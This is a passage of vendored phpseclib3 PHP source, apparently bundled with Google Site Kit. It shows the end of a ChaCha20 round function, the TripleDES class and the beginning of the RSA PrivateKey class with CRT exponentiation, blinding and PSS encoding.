$x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // @codingStandardsIgnoreEnd $x0 += $z0; $x1 += $z1; $x2 += $z2; $x3 += $z3; $x4 += $z4; $x5 += $z5; $x6 += $z6; $x7 += $z7; $x8 += $z8; $x9 += $z9; $x10 += $z10; $x11 += $z11; $x12 += $z12; $x13 += $z13; $x14 += $z14; $x15 += $z15; return \pack('V*', $x0, $x1, $x2, $x3, $x4, $x5, $x6, $x7, $x8, $x9, $x10, $x11, $x12, $x13, $x14, $x15); } } <?php /** * Pure-PHP implementation of Triple DES. * * Uses mcrypt, if available, and an internal implementation, otherwise. Operates in the EDE3 mode (encrypt-decrypt-encrypt). * * PHP version 5 * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $des = new \phpseclib3\Crypt\TripleDES('ctr'); * * $des->setKey('abcdefghijklmnopqrstuvwx'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $des->decrypt($des->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; /** * Pure-PHP implementation of Triple DES. * * @author Jim Wigginton <terrafrost@php.net> */ class TripleDES extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES { /** * Encrypt / decrypt using inner chaining * * Inner chaining is used by SSH-1 and is generally considered to be less secure then outer chaining (self::MODE_CBC3). */ const MODE_3CBC = -2; /** * Encrypt / decrypt using outer chaining * * Outer chaining is used by SSH-2 and when the mode is set to \phpseclib3\Crypt\Common\BlockCipher::MODE_CBC. */ const MODE_CBC3 = self::MODE_CBC; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\TripleDES::setKeyLength() * @var int */ protected $key_length = 24; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\DES::cipher_name_mcrypt * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'tripledes'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 750; /** * max possible size of $key * * @see self::setKey() * @see \phpseclib3\Crypt\DES::setKey() * @var string */ protected $key_length_max = 24; /** * Internal flag whether using self::MODE_3CBC or not * * @var bool */ private $mode_3cbc; /** * The \phpseclib3\Crypt\DES objects * * Used only if $mode_3cbc === true * * @var array */ private $des; /** * Default Constructor. * * Determines whether or not the mcrypt or OpenSSL extensions should be used. * * $mode could be: * * - ecb * * - cbc * * - ctr * * - cfb * * - ofb * * - 3cbc * * - cbc3 (same as cbc) * * @see \phpseclib3\Crypt\DES::__construct() * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param string $mode */ public function __construct($mode) { switch (\strtolower($mode)) { // In case of self::MODE_3CBC, we init as CRYPT_DES_MODE_CBC // and additional flag us internally as 3CBC case '3cbc': parent::__construct('cbc'); $this->mode_3cbc = \true; // This three $des'es will do the 3CBC work (if $key > 64bits) $this->des = [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('cbc'), new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('cbc'), new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('cbc')]; // we're going to be doing the padding, ourselves, so disable it in the \phpseclib3\Crypt\DES objects $this->des[0]->disablePadding(); $this->des[1]->disablePadding(); $this->des[2]->disablePadding(); break; case 'cbc3': $mode = 'cbc'; // fall-through // If not 3CBC, we init as usual default: parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\BadModeException('Block ciphers cannot be ran in stream mode'); } } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { $this->cipher_name_openssl_ecb = 'des-ede3'; $mode = $this->openssl_translate_mode(); $this->cipher_name_openssl = $mode == 'ecb' ? 'des-ede3' : 'des-ede3-' . $mode; } return parent::isValidEngineHelper($engine); } /** * Sets the initialization vector. * * SetIV is not required when \phpseclib3\Crypt\Common\SymmetricKey::MODE_ECB is being used. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setIV() * @param string $iv */ public function setIV($iv) { parent::setIV($iv); if ($this->mode_3cbc) { $this->des[0]->setIV($iv); $this->des[1]->setIV($iv); $this->des[2]->setIV($iv); } } /** * Sets the key length. * * Valid key lengths are 128 and 192 bits. * * If you want to use a 64-bit key use DES.php * * @see \phpseclib3\Crypt\Common\SymmetricKey:setKeyLength() * @throws \LengthException if the key length is invalid * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 192: break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128 or 192 bits are supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Triple DES can use 128-bit (eg. strlen($key) == 16) or 192-bit (eg. strlen($key) == 24) keys. * * DES also requires that every eighth bit be a parity bit, however, we'll ignore that. * * @see \phpseclib3\Crypt\DES::setKey() * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @throws \LengthException if the key length is invalid * @param string $key */ public function setKey($key) { if ($this->explicit_key_length !== \false && \strlen($key) != $this->explicit_key_length) { throw new \LengthException('Key length has already been set to ' . $this->explicit_key_length . ' bytes and this key is ' . \strlen($key) . ' bytes'); } switch (\strlen($key)) { case 16: $key .= \substr($key, 0, 8); break; case 24: break; default: throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes 16 or 24 are supported'); } // copied from self::setKey() $this->key = $key; $this->key_length = \strlen($key); $this->changed = $this->nonIVChanged = \true; $this->setEngine(); if ($this->mode_3cbc) { $this->des[0]->setKey(\substr($key, 0, 8)); $this->des[1]->setKey(\substr($key, 8, 8)); $this->des[2]->setKey(\substr($key, 16, 8)); } } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @param string $plaintext * @return string $cipertext */ public function encrypt($plaintext) { // parent::en/decrypt() is able to do all the work for all modes and keylengths, // except for: self::MODE_3CBC (inner chaining CBC) with a key > 64bits // if the key is smaller then 8, do what we'd normally do if ($this->mode_3cbc && \strlen($this->key) > 8) { return $this->des[2]->encrypt($this->des[1]->decrypt($this->des[0]->encrypt($this->pad($plaintext)))); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->mode_3cbc && \strlen($this->key) > 8) { return $this->unpad($this->des[0]->decrypt($this->des[1]->encrypt($this->des[2]->decrypt(\str_pad($ciphertext, \strlen($ciphertext) + 7 & 0xfffffff8, "\x00"))))); } return parent::decrypt($ciphertext); } /** * Treat consecutive "packets" as if they are a continuous buffer. * * Say you have a 16-byte plaintext $plaintext. Using the default behavior, the two following code snippets * will yield different outputs: * * <code> * echo $des->encrypt(substr($plaintext, 0, 8)); * echo $des->encrypt(substr($plaintext, 8, 8)); * </code> * <code> * echo $des->encrypt($plaintext); * </code> * * The solution is to enable the continuous buffer. Although this will resolve the above discrepancy, it creates * another, as demonstrated with the following: * * <code> * $des->encrypt(substr($plaintext, 0, 8)); * echo $des->decrypt($des->encrypt(substr($plaintext, 8, 8))); * </code> * <code> * echo $des->decrypt($des->encrypt(substr($plaintext, 8, 8))); * </code> * * With the continuous buffer disabled, these would yield the same output. With it enabled, they yield different * outputs. The reason is due to the fact that the initialization vector's change after every encryption / * decryption round when the continuous buffer is enabled. When it's disabled, they remain constant. * * Put another way, when the continuous buffer is enabled, the state of the \phpseclib3\Crypt\DES() object changes after each * encryption / decryption round, whereas otherwise, it'd remain constant. For this reason, it's recommended that * continuous buffers not be used. They do offer better security and are, in fact, sometimes required (SSH uses them), * however, they are also less intuitive and more likely to cause you problems. * * @see \phpseclib3\Crypt\Common\SymmetricKey::enableContinuousBuffer() * @see self::disableContinuousBuffer() */ public function enableContinuousBuffer() { parent::enableContinuousBuffer(); if ($this->mode_3cbc) { $this->des[0]->enableContinuousBuffer(); $this->des[1]->enableContinuousBuffer(); $this->des[2]->enableContinuousBuffer(); } } /** * Treat consecutive packets as if they are a discontinuous buffer. * * The default behavior. * * @see \phpseclib3\Crypt\Common\SymmetricKey::disableContinuousBuffer() * @see self::enableContinuousBuffer() */ public function disableContinuousBuffer() { parent::disableContinuousBuffer(); if ($this->mode_3cbc) { $this->des[0]->disableContinuousBuffer(); $this->des[1]->disableContinuousBuffer(); $this->des[2]->disableContinuousBuffer(); } } /** * Creates the key schedule * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { switch (\true) { // if $key <= 64bits we configure our internal pure-php cipher engine // to act as regular [1]DES, not as 3DES. mcrypt.so::tripledes does the same. case \strlen($this->key) <= 8: $this->des_rounds = 1; break; // otherwise, if $key > 64bits, we configure our engine to work as 3DES. default: $this->des_rounds = 3; // (only) if 3CBC is used we have, of course, to setup the $des[0-2] keys also separately. if ($this->mode_3cbc) { $this->des[0]->setupKey(); $this->des[1]->setupKey(); $this->des[2]->setupKey(); // because $des[0-2] will, now, do all the work we can return here // not need unnecessary stress parent::setupKey() with our, now unused, $key. return; } } // setup our key parent::setupKey(); } /** * Sets the internal crypt engine * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @see \phpseclib3\Crypt\Common\SymmetricKey::setPreferredEngine() * @param int $engine */ public function setPreferredEngine($engine) { if ($this->mode_3cbc) { $this->des[0]->setPreferredEngine($engine); $this->des[1]->setPreferredEngine($engine); $this->des[2]->setPreferredEngine($engine); } parent::setPreferredEngine($engine); } } <?php /** * RSA Private Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ final class PrivateKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey { use Common\Traits\PasswordProtected; /** * Primes for Chinese Remainder Theorem (ie. p and q) * * @var array */ protected $primes; /** * Exponents for Chinese Remainder Theorem (ie. dP and dQ) * * @var array */ protected $exponents; /** * Coefficients for Chinese Remainder Theorem (ie. qInv) * * @var array */ protected $coefficients; /** * Private Exponent * * @var BigInteger */ protected $privateExponent; /** * RSADP * * See {@link http://tools.ietf.org/html/rfc3447#section-5.1.2 RFC3447#section-5.1.2}. * * @return bool|BigInteger */ private function rsadp(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $c) { if ($c->compare(self::$zero) < 0 || $c->compare($this->modulus) > 0) { throw new \OutOfRangeException('Ciphertext representative out of range'); } return $this->exponentiate($c); } /** * RSASP1 * * See {@link http://tools.ietf.org/html/rfc3447#section-5.2.1 RFC3447#section-5.2.1}. * * @return bool|BigInteger */ private function rsasp1(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $m) { if ($m->compare(self::$zero) < 0 || $m->compare($this->modulus) > 0) { throw new \OutOfRangeException('Signature representative out of range'); } return $this->exponentiate($m); } /** * Exponentiate * * @param BigInteger $x * @return BigInteger */ protected function exponentiate(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { switch (\true) { case empty($this->primes): case $this->primes[1]->equals(self::$zero): case empty($this->coefficients): case $this->coefficients[2]->equals(self::$zero): case empty($this->exponents): case $this->exponents[1]->equals(self::$zero): return $x->modPow($this->exponent, $this->modulus); } $num_primes = \count($this->primes); if (!static::$enableBlinding) { $m_i = [1 => $x->modPow($this->exponents[1], $this->primes[1]), 2 => $x->modPow($this->exponents[2], $this->primes[2])]; $h = $m_i[1]->subtract($m_i[2]); $h = $h->multiply($this->coefficients[2]); list(, $h) = $h->divide($this->primes[1]); $m = $m_i[2]->add($h->multiply($this->primes[2])); $r = $this->primes[1]; for ($i = 3; $i <= $num_primes; $i++) { $m_i = $x->modPow($this->exponents[$i], $this->primes[$i]); $r = $r->multiply($this->primes[$i - 1]); $h = $m_i->subtract($m); $h = $h->multiply($this->coefficients[$i]); list(, $h) = $h->divide($this->primes[$i]); $m = $m->add($r->multiply($h)); } } else { $smallest = $this->primes[1]; for ($i = 2; $i <= $num_primes; $i++) { if ($smallest->compare($this->primes[$i]) > 0) { $smallest = $this->primes[$i]; } } $r = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange(self::$one, $smallest->subtract(self::$one)); $m_i = [1 => $this->blind($x, $r, 1), 2 => $this->blind($x, $r, 2)]; $h = $m_i[1]->subtract($m_i[2]); $h = $h->multiply($this->coefficients[2]); list(, $h) = $h->divide($this->primes[1]); $m = $m_i[2]->add($h->multiply($this->primes[2])); $r = $this->primes[1]; for ($i = 3; $i <= $num_primes; $i++) { $m_i = $this->blind($x, $r, $i); $r = $r->multiply($this->primes[$i - 1]); $h = $m_i->subtract($m); $h = $h->multiply($this->coefficients[$i]); list(, $h) = $h->divide($this->primes[$i]); $m = $m->add($r->multiply($h)); } } return $m; } /** * Performs RSA Blinding * * Protects against timing attacks by employing RSA Blinding. * Returns $x->modPow($this->exponents[$i], $this->primes[$i]) * * @param BigInteger $x * @param BigInteger $r * @param int $i * @return BigInteger */ private function blind(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, $i) { $x = $x->multiply($r->modPow($this->publicExponent, $this->primes[$i])); $x = $x->modPow($this->exponents[$i], $this->primes[$i]); $r = $r->modInverse($this->primes[$i]); $x = $x->multiply($r); list(, $x) = $x->divide($this->primes[$i]); return $x; } /** * EMSA-PSS-ENCODE * * See {@link http://tools.ietf.org/html/rfc3447#section-9.1.1 RFC3447#section-9.1.1}. * * @return string * @param string $m * @throws \RuntimeException on encoding error * @param int $emBits */ private function emsa_pss_encode($m, $emBits) { // if $m is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. $emLen = $emBits + 1 >> 3; // ie. ceil($emBits / 8) $sLen = $this->sLen !== null ? $this->sLen : $this->hLen; $mHash = $this->hash->hash($m); if ($emLen < $this->hLen + $sLen + 2) { throw new \LengthException('RSA modulus too short'); } $salt = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($sLen); $m2 = "\x00\x00\x00\x00\x00\x00\x00\x00" . $mHash . $salt; $h = $this->hash->hash($m2); $ps = \str_repeat(\chr(0), $emLen - $sLen - $this->hLen - 2); $db = $ps . \chr(1) . $salt; $dbMask = $this->mgf1($h, $emLen - $this->hLen - 1); // ie. stlren($db) $maskedDB = $db ^ $dbMask; $maskedDB[0] = ~\chr(0xff << ($emBits & 7)) & $maskedDB[0]; $em = $maskedDB . $h . \chr(0xbc); return $em; } /** * RSASSA-PSS-SIGN * * See {@link http://tools.ietf.org/html/rfc3447#section-8.1.1 RFC3447#section-8.1.1}. * * @param string $m * @return bool|string */ private function rsassa_pss_sign($m) { // EMSA-PSS encoding $em = $this->emsa_pss_encode($m, 8 * $this->k - 1); // RSA signature $m = $this->os2ip($em); $s = $this->rsasp1($m); $s = $this->i2osp($s, $this->k); // Output the signature S return $s; } /** * RSASSA-PKCS1-V1_5-SIGN * * See {@link http://tools.ietf.org/html/rfc3447#section-8.2.1 RFC3447#section-8.2.1}. * * @param string $m * @throws \LengthException if the RSA modulus is too short * @return bool|string */ private function rsassa_pkcs1_v1_5_sign($m) { // EMSA-PKCS1-v1_5 encoding // If the encoding operation outputs "intended encoded message length too short," output "RSA modulus // too short" and stop. try { $em = $this->emsa_pkcs1_v1_5_encode($m, $this->k); } catch (\LengthException $e) { throw new \LengthException('RSA modulus too short'); } // RSA signature $m = 